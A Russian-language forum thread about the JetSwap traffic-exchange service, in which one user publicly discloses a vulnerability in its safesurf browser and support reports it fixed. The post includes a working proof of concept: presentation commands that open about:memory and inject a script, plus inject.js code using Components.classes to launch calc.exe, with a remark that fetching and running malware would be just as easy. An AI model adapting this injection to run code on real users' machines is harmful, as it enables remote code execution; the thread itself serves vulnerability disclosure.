уязвимость

Обсуждение работы системы JetSwap. Общий форум для всех вопросов, для которых не создано отдельных форумов.
bardak
Сообщения: 3
Зарегистрирован: 05 дек 2012, 15:38

уязвимость

Непрочитанное сообщение bardak »

Добрый день, обнаружил достаточно серьезную уязвимость на вашем сайте, с кем можно поговорить по этому вопросу? писал в скайп jetswaplive, в техподдержку не отвечают.

Аватара пользователя
loller5
Сообщения: 2549
Зарегистрирован: 28 ноя 2010, 01:32
Откуда: Из гнезда.

Re: уязвимость

Непрочитанное сообщение loller5 »

Если через тикеты писали, то ответят до 48 часов.

promot
Сообщения: 164
Зарегистрирован: 06 май 2011, 09:26

Re: уязвимость

Непрочитанное сообщение promot »

Здравствуйте дорогие детки. Сейчас я расскажу сказку о том как запустить вирус на любой машинке, где установлен safesurf :roll:

Собственно уязвимость в том, что safesurf позволяет открыть через команды презентации внутренние страницы браузера, такие как about:memory и т.д., через которые можно получить доступ к Components.classes.

Презентация может быть такой

Код: Выделить всё

Переход  about:memory
Вставить скрипт <dls(path_to/inject.js)>
Ну, собственно, так можно запустить калькулятор (содержимое inject.js):

Код: Выделить всё

var file = Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);
file.initWithPath("C:\\Windows\\System32\\calc.exe");
file.launch();


Закачать и запустить какую-нибудь злобную программку, думаю, тоже труда не составит. Делайте выводы господа администраторы...

____________________________________________________

Проверим
loller5

____________________________________________________

Да уж, как я понимаю, работает только с данной странице, т.к. есть загрузка файла?
loller5
Добавлено в 29 апр 2015, 19:02

Ну я другие страницы не смотрел, может на каких-то еще возможно.

Аватара пользователя
Support
Служба поддержки
Сообщения: 4511
Зарегистрирован: 08 фев 2009, 19:24
Откуда: JetSwap
Контактная информация:

Re: уязвимость

Непрочитанное сообщение Support »

Спасибо, уязвимость закрыли.
С уважением, Служба поддержки.
http://www.jetswap.com

bardak
Сообщения: 3
Зарегистрирован: 05 дек 2012, 15:38

Re: уязвимость

Непрочитанное сообщение bardak »

а то что я написал вообще никого не интересует... :(

Ответить